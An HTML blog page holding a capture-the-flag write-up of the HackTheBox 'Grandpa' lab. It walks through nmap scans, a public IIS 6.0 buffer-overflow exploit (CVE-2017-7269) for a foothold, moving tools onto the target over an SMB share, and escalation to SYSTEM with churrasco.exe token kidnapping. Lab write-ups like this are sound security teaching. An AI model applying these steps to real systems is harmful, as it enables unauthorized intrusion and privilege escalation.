<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="Grandpa [HTB]" /><meta property="og:locale" content="en" /><meta name="description" content="Grandpa" /><meta property="og:description" content="Grandpa" /><link rel="canonical" href="https://vx86.github.io/posts/grandpa/" /><meta property="og:url" content="https://vx86.github.io/posts/grandpa/" /><meta property="og:site_name" content="Vx86 Cybersec" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-12-18T17:45:00+01:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="Grandpa [HTB]" /><meta name="twitter:site" content="@twitter_username" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"description":"Grandpa","url":"https://vx86.github.io/posts/grandpa/","headline":"Grandpa [HTB]","dateModified":"2021-12-18T17:45:00+01:00","datePublished":"2021-12-18T17:45:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://vx86.github.io/posts/grandpa/"},"@type":"BlogPosting","@context":"https://schema.org"}</script><title>Grandpa [HTB] | Vx86 Cybersec</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Vx86 Cybersec"><meta name="application-name" content="Vx86 Cybersec"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="https://avatars.githubusercontent.com/u/26335498?s=400&u=33a3504847698340f88f46e6920a4b1b6e6df89a&v=4" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Vx86 Cybersec</a></div><div class="site-subtitle font-italic">Security blog about CTF Write-ups, Researches, Tools and such</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://github.com/Vx86" aria-label="github" class="order-3" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/twitter_username" aria-label="twitter" class="order-4" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['example','domain.com'].join('@')" aria-label="email" class="order-5" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" class="order-6" > <i class="fas fa-rss"></i> </a> <span class="icon-border order-2"></span> <span id="mode-toggle-wrapper" class="order-1"> <i class="mode-toggle fas fa-adjust"></i> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } var self = this; /* always follow the system prefers */ this.sysDarkPrefers.addListener(function() { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.updateMermaid(); }); } /* constructor() */ setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode == ModeToggle.DARK_MODE; } get isLightMode() { return this.mode == ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer) ) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } updateMermaid() { if (typeof mermaid !== "undefined") { let expectedTheme = (this.modeStatus === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); mermaid.init(undefined, ".mermaid"); } } flipMode() { if (this.hasMode) { if (this.isSysDarkPrefer) { if (this.isLightMode) { this.clearMode(); } else { this.setLight(); } } else { if (this.isDarkMode) { this.clearMode(); } else { this.setDark(); } } } else { if (this.isSysDarkPrefer) { this.setLight(); } else { this.setDark(); } } this.updateMermaid(); } /* flipMode() */ } /* ModeToggle */ let toggle = new ModeToggle(); $(".mode-toggle").click(function() { toggle.flipMode(); }); </script> </span></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>Grandpa [HTB]</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Grandpa [HTB]</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Vx86 </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sat, Dec 18, 2021, 5:45 PM +0100" >Dec 18, 2021<i class="unloaded">2021-12-18T17:45:00+01:00</i> </span></div><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1245 words">6 min read</span></div></div><div class="post-content"><h1 id="grandpa">Grandpa</h1><p><img data-proofer-ignore data-src="/assets/img/grandpa/grandpa_banner.png" alt="grandpa_banner" /></p><p><a href="https://app.hackthebox.com/machines/13">Grandpa</a> is an easy windows machine available on HackTheBox and is the second box I chose in the OSCP learning series. Let’s dive into it.</p><h2 id="reconnaissance">Reconnaissance</h2><p>Starting with the usual TCP port scan with <code class="language-plaintext highlighter-rouge">nmap</code></p><pre><code class="language-txt">sudo nmap -sS -sV -p- 10.129.95.233 -oA scan/grandpa_scan -vv

PORT   STATE SERVICE REASON          VERSION
80/tcp open  http    syn-ack ttl 127 Microsoft IIS httpd 6.0
</code></pre><p>Only the port 80 is open, let’s see what is hiding behind the port.</p><h3 id="http---port-80">HTTP - Port 80</h3><p>Microsoft IIS web server is confirmed with the message <code class="language-plaintext highlighter-rouge">Enabling and Disabling Dynamic Content" in IIS Help</code> on the frontpage.</p><p>We can run default nmap script on the target to check for potential vuln.</p><pre><code class="language-txt">sudo nmap -sC -p 80 10.129.95.233 -vv  

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 127
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Fri, 17 Dec 2021 20:45:29 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|_  Server Type: Microsoft-IIS/6.0
</code></pre><p>Running more aggressive <code class="language-plaintext highlighter-rouge">nmap</code> script, we find the webserver is using something called <code class="language-plaintext highlighter-rouge">Frontpage</code>.</p><pre><code class="language-txt">nmap --script=vuln -p 80 10.129.95.233 -vv

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack ttl 127
| http-enum: 
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|_  /_vti_bin/shtml.exe: Frontpage file or folder
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-iis-webdav-vuln: WebDAV is ENABLED. No protected folder found; check not run. If you know a protected folder, add --script-args=webdavfolder=&lt;path&gt;
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-frontpage-login: 
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
</code></pre><h2 id="initial-foothold">Initial Foothold</h2><p>After searching around an hour for exploits against Frontpage and Microsoft IIS 6.0, an interesting article pops up : <a href="https://www.trendmicro.com/en_us/research/17/c/iis-6-0-vulnerability-leads-code-execution.html">IIS 6.0 Vulnerability Leads to Code Execution</a>.</p><p>The article is talking about <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7269">CVE-2017-7269</a>, a vulnerability in IIS 6.0 using a buffer overflow to gain remote code execution.</p><p>We can find multiple exploit on github, I chose this one (<a href="https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269">https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269</a>)</p><p>Running a listener on our host, we execute the exploit and we are in !</p><p><img data-proofer-ignore data-src="/assets/img/grandpa/grandpa_foothold.png" alt="foothold" /></p><h2 id="privilege-escalation">Privilege Escalation</h2><p>Let’s enumerate the system to find information we can use to escalate our privilege.</p><p>First we can find general system information with <code class="language-plaintext highlighter-rouge">systeminfo</code></p><pre><code class="language-txt">c:\windows\system32\inetsrv&gt;systeminfo

Host Name:                 GRANPA
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Uniprocessor Free
Registered Owner:          HTB
Registered Organization:   HTB
Product ID:                69712-296-0024942-44782
Original Install Date:     4/12/2017, 5:07:40 PM
System Up Time:            0 Days, 16 Hours, 43 Minutes, 36 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              INTEL  - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory:     1,023 MB
Available Physical Memory: 753 MB
Page File: Max Size:       2,470 MB
Page File: Available:      2,295 MB
Page File: In Use:         175 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 1 Hotfix(s) Installed.
                           [01]: Q147222
Network Card(s):           N/A
</code></pre><p>The OS is pretty old, it’s a <code class="language-plaintext highlighter-rouge">Microsoft Windows Server 2003</code>. Those information might be useful to use with tools like <a href="https://github.com/bitsadmin/wesng">Windows Exploit Suggester</a>.</p><p>We can also check our privileges information.</p><pre><code class="language-txt">whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAuditPrivilege              Generate security audits                  Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
</code></pre><p>We can see a very interesting token called <code class="language-plaintext highlighter-rouge">SeImpersonatePrivilege</code>. This token is used to impersonate a client after authentication. Whenever a user is assigned the <code class="language-plaintext highlighter-rouge">SeImpersontatePrivilege</code>, the user is permitted to run programs on behalf of that user to impersonate a client.</p><p>There are tools we can use like <a href="https://github.com/ohpe/juicy-potato">JuicyPotato</a> that will exploit this token to escalate to <code class="language-plaintext highlighter-rouge">NT Authority\System</code>.</p><p>In order to run the tool on the target, we first need to upload it there, and transfering files on a Windows machine can sometimes be a bit clumsy.</p><p>The first binary we can try is <code class="language-plaintext highlighter-rouge">certutil</code>. This binary is available natively on Windows machines and its main goal is to manage certificates but pentesters and hackers alike diverted its original use to download malicious files on target. It’s called <em>Living Off The Land</em>, find more information on the <a href="https://lolbas-project.github.io">LOLBAS</a> project.</p><p>Unfortunately without really knowing why, the <code class="language-plaintext highlighter-rouge">certutil</code> binary was not downloading the executable on the target.</p><p>Lucky for us, there are other ways to upload files. The second method we can use is using the <code class="language-plaintext highlighter-rouge">SMB</code> protocol.</p><p>First we create a SMB share with <code class="language-plaintext highlighter-rouge">impacket-smbserver.py</code> to make our executable available and we pull the file from the server with <code class="language-plaintext highlighter-rouge">copy \\IP\share\filename</code></p><p><img data-proofer-ignore data-src="/assets/img/grandpa/grandpa_smb.png" alt="grandpa_smb" /></p><p>The file has successfully been transfered on the target.</p><p>We can now run our malicious executable.</p><pre><code class="language-txt">C:\WINDOWS\Temp&gt;JuicyPotato.exe
JuicyPotato.exe
The image file C:\WINDOWS\Temp\JuicyPotato.exe is valid, but is for a machine type other than the current machine.
</code></pre><p>We have a new problem…The executable seems to be incompatible with our target. Remember the OS is an old Windows Server 2003. We have to find a way to exploit this token. Back to online searching !</p><p>After searching for specific information related to token and microsoft 2003, an <a href="https://msrc-blog.microsoft.com/2009/04/14/ms09-012-fixing-token-kidnapping/">article</a> from Microsoft caught my eyes, the article is talking about an attack called <em>Token Kidnapping</em>. We can specify our research even more, and…boom ! <a href="https://medium.com/@nmappn/windows-privelege-escalation-via-token-kidnapping-6195edd2660e">Windows Privilege Escalation via Token Kidnapping</a></p><p>The tool used is <code class="language-plaintext highlighter-rouge">churrasco.exe</code>, and can be found <a href="https://github.com/Re4son/Churrasco/blob/master/churrasco.exe">here</a>.</p><p>After uploading it on the target using the SMB method. Let’s see if it works…and yes it actually did work !</p><pre><code class="language-txt">churrasco.exe -d whoami
/churrasco/--&gt;Current User: NETWORK SERVICE 
/churrasco/--&gt;Getting Rpcss PID ...
/churrasco/--&gt;Found Rpcss PID: 672 
/churrasco/--&gt;Searching for Rpcss threads ...
/churrasco/--&gt;Found Thread: 676 
/churrasco/--&gt;Thread not impersonating, looking for another thread...
/churrasco/--&gt;Found Thread: 680 
/churrasco/--&gt;Thread not impersonating, looking for another thread...
/churrasco/--&gt;Found Thread: 688 
/churrasco/--&gt;Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/--&gt;Getting SYSTEM token from Rpcss Service...
/churrasco/--&gt;Found NETWORK SERVICE Token
/churrasco/--&gt;Found LOCAL SERVICE Token
/churrasco/--&gt;Found SYSTEM token 0x728
/churrasco/--&gt;Running command with SYSTEM Token...
/churrasco/--&gt;Done, command should have ran as SYSTEM!
nt authority\system
</code></pre><p>We can run the same command but replacing the <code class="language-plaintext highlighter-rouge">whoami</code> command with <code class="language-plaintext highlighter-rouge">cmd</code> to gain a shell as <code class="language-plaintext highlighter-rouge">nt autorithy\system</code> !</p><p>We have rooted the box !</p><h2 id="conclusion">Conclusion</h2><p>As I’m not used to work with Windows machines, it was a really tough challenge even though the box is considered easy. The fact that the machine was really old caught me off guard.</p><p>Hacking this box made me learn alternative ways to transfer file on Windows and showed me that searching for solutions on Internet is a big part of the job and needed to be further improved.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/writeups/'>Writeups</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb/" class="post-tag no-text-decoration" >htb</a> <a href="/tags/easy/" class="post-tag no-text-decoration" >easy</a> <a href="/tags/windows/" class="post-tag no-text-decoration" >windows</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Grandpa [HTB] - Vx86 Cybersec&url=https://vx86.github.io/posts/grandpa/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Grandpa [HTB] - Vx86 Cybersec&u=https://vx86.github.io/posts/grandpa/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Grandpa [HTB] - Vx86 Cybersec&url=https://vx86.github.io/posts/grandpa/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/solar/">Solar, exploiting log4j [THM]</a><li><a href="/posts/nibbles/">Nibbles [HTB]</a><li><a href="/posts/helloworld/">Hello World</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/blog/">blog</a> <a class="post-tag" href="/tags/log4j/">log4j</a> <a class="post-tag" href="/tags/medium/">medium</a> <a class="post-tag" href="/tags/thm/">thm</a> <a class="post-tag" href="/tags/windows/">windows</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/nibbles/"><div class="card-body"> <span class="timeago small" >Dec 17, 2021<i class="unloaded">2021-12-17T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Nibbles [HTB]</h3><div class="text-muted small"><p> Nibbles With the goal of taking the OSCP exam next year, I started my journey of pentesting machines from HackTheBox using the TJNull’s TryHarder machine list. Nibbles is is the first in a lon...</p></div></div></a></div><div class="card"> <a href="/posts/valentine/"><div class="card-body"> <span class="timeago small" >Dec 22, 2021<i class="unloaded">2021-12-22T18:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Valentine [HTB]</h3><div class="text-muted small"><p> Valentine Valentine is an easy linux machine on HackTheBox. It is the third box in the OSCP learning series. Let’s not waste more time and start right away. Reconnaissance We start with the us...</p></div></div></a></div><div class="card"> <a href="/posts/forge/"><div class="card-body"> <span class="timeago small" >Mar 6<i class="unloaded">2022-03-06T09:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Forge [HTB]</h3><div class="text-muted small"><p> Forge Forge is a medium linux machine on HackTheBox and is today’s target. Recon As always, we start with network discovery with a nmap scan. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 #nmap -s...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/nibbles/" class="btn btn-outline-primary" prompt="Older"><p>Nibbles [HTB]</p></a> <a href="/posts/valentine/" class="btn btn-outline-primary" prompt="Newer"><p>Valentine [HTB]</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/username">Vx86</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/htb/">htb</a> <a class="post-tag" href="/tags/easy/">easy</a> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/blog/">blog</a> <a class="post-tag" href="/tags/log4j/">log4j</a> <a class="post-tag" href="/tags/medium/">medium</a> <a class="post-tag" href="/tags/thm/">thm</a> <a class="post-tag" href="/tags/windows/">windows</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id="></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', ''); }); </script>
